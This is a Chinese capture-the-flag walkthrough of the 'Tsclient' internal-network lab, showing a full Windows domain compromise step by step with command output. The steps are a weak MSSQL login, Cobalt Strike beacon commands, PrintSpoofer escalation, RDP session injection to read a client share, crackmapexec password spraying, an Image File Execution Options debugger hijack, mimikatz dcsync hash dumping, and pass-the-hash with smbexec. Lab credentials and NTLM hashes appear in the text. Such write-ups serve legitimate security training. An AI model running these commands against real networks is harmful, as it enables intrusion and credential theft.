春秋云镜渗透靶场Tsclient

靶标介绍:

Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。

知识点呈现: MSSQL Kerberos 域渗透 RDP Privilege Elevation

详细讲解:

flag1

fscan先信息收集一波

image-20250522153714553

存在mssql弱密码

1
MSSQL 39.99.239.83:1433 sa 1qaz!QAZ

我们直接用MUDT进行链接

1
https://github.com/SafeGroceryStore/MDUT/releases/tag/v2.1.1

上传fscan扫一下内网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[05/22 20:22:29] [*] Tasked beacon to run: C:/Users/Public/fscan.exe -h 172.22.8.1/24
[05/22 20:22:29] [+] host called home, sent: 73 bytes
[05/22 20:22:39] [+] received output:

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.18     is alive  当前web端
(icmp) Target 172.22.8.31     is alive
(icmp) Target 172.22.8.15     is alive
(icmp) Target 172.22.8.46     is alive
[*] Icmp alive hosts len is: 4
172.22.8.46:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:1433 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:88 open
Open result.txt error, open result.txt: Access is denied.
[*] alive ports len is: 16
start vulscan
[*] NetInfo 
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:103d:2481:d89d:9388
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT         
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo 
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01           
Open result.txt error, open result.txt: Access is denied.
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
Open result.txt error, open result.txt: Access is denied.

发现

1
2
3
4
WIN-WEB(本机):172.22.8.18
WIN19-CLIENT:172.22.8.31,存在于域环境,域名XIAORANG
DC01:172.22.8.15,根据名字和.31主机的netbios得知这就是域控
WIN2016:172.22.8.46,windwos server 2016操作系统,域名WIN2016.xiaorang.lab

WIN-WEB提权

MDUT上传PrintSpoofer.exe进行提权

1
https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

命令

1
beacon> shell C:/Users/Public/PrintSpoofer32.exe -i -c "whoami"

image-20250522203342740

用这个程序执行上传的cs马即可提权

1
beacon> shell C:/Users/Public/PrintSpoofer32.exe -i -c "C:/Users/Public/b.exe"

image-20250522203424236

拿到SYSTEM权限后,尝试直接查找一下

其实跟以前一样, 进去翻翻就还在那

1
shell type C:\Users\Administrator\flag\flag01.txt

image-20250522204136773

1
flag01: flag{ce5d1fe4-c84f-4522-8d5c-e868f29bd63f}

这里给出提示Maybe you should focus on user sessions…

注意会话信息

flag2

那就重点枚举用户信息

image-20250522204454058

列举john

image-20250522204522039

1
shell quser || qwinst #查看在线用户

image-20250522204919018

从上面三个命令可以发现,John用户的类型为Admin,它的会话为rdp远程连接。通过注入进程的方式拿到一个用户为John的会话inject pid

image-20250522205710379

shell net use查看网络共享

image-20250522210004414

然后查看一下,发现一个txt文件

1
2
shell dir \\TSCLIENT\C
shell type \\TSCLIENT\C\credential.txt

image-20250522210025567

image-20250522210212505

1
2
3
xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

记录着一个用户的域用户的账户密码,并且里面还有提示,镜像劫持。

密码喷洒

设置好代理之后,我们尝试密码喷洒,看看哪些主机可以登录。

1
proxychains4 -q  crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

撞到了WIN2016、WIN19-CLIENT、DC01(其实就是内网的所有主机都能用这个账户密码)

image-20250522211613144

win19应该是域控, 改完密码之后都可以登录了

1
2
3
4
5
6
7
8
9
10
11
12
账号:xiaorang.lab\Aldrich
密码:Ald@rLMWuy7Z!#
kali
proxychains4  rdesktop 172.22.8.31
proxychains4  rdesktop 172.22.8.46
先redesktop改个密码
Ald@rLMWuy7Z!# -> 1qaz@WSX

windows 利用proxifier
mstsc

Ald@rLMWuy7Z!# -> 1qaz@WSX

我们登录172.22.8.46

发现机子在域内

ping百度发现不出网

WIN2016映像劫持提权

按照之前的提示就是用映像劫持去打了,运行下面命令,发现NT AUTHORITY\Authenticated Users可以修改注册表,即所有账号密码登录的用户都可以修改注册表,利用这个性质,修改注册表,使用放大镜进行提权

1
2
3
4
5
6
powershell: Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl
#发现NT AUTHORITY\Authenticated Users可以修改注册表
#即所有账号密码登录的用户都可以修改注册表,利用这个性质,修改注册表,使用放大镜进行提权

#执行下面的语句,修改注册表。
cmd: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

开始—用户—锁定,右下角打开放大镜就能拿到system权限的cmd

image-20250522213249119

还是那个目录找到flag

image-20250522213352517

1
flag02: flag{a176e8ee-6378-40a8-b38d-08cac2606d27}

flag3

1
2
cd ../../
cd Users/Aldr*

直接代理上线创建一个中转监听器, 然后利用中转监听器创建木马, 直接ctrl c ctrl v到46机子中执行

然后利用映像劫持执行就能拿到system权限

image-20250526184328990

拿下域控

域用户信息收集

1
logonpasswords

image-20250526184638762

1
shell net user /domain

把猕猴桃也传上去

1
shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
[05/26 18:58:21] [*] Tasked beacon to run: C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
[05/26 18:58:21] [+] host called home, sent: 137 bytes
[05/26 18:58:22] [+] received output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	3ffd5b58b4a6328659a606c3ea6f9b63	514
1000	DC01$	f96c2590d6a79fcb1ef4238ade63a071	532480
500	Administrator	2c9d81bdcf3ec8b1def10328a7cc2f08	512
1103	WIN2016$	6e3b4351775ddedcfee0c3632f9747c4	16781312
1104	WIN19-CLIENT$	e2f7b9fef4b865cf2f721d512ad3c35a	16781312
1105	Aldrich	161cff084477fe596a5db81874498a24	512

mimikatz(commandline) # exit
Bye!

mimikatz拿到域管理员的hash

impacket工具包进行横向移动

1
https://github.com/fortra/impacket/releases/tag/impacket_0_12_0

使用impacket里的smbexec.py进行hash传递登录域控DC01(172.22.8.15),拿到system的cmdshell,拿下flag03

1
proxychains4 python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

之后就可以进行横向移动了

1
type c:\users\administrator\flag\flag03.txt

拿到最后一个flag

image-20250526190926034

1
flag03: flag{a35a1425-b7e0-4c06-9282-3e6498145792}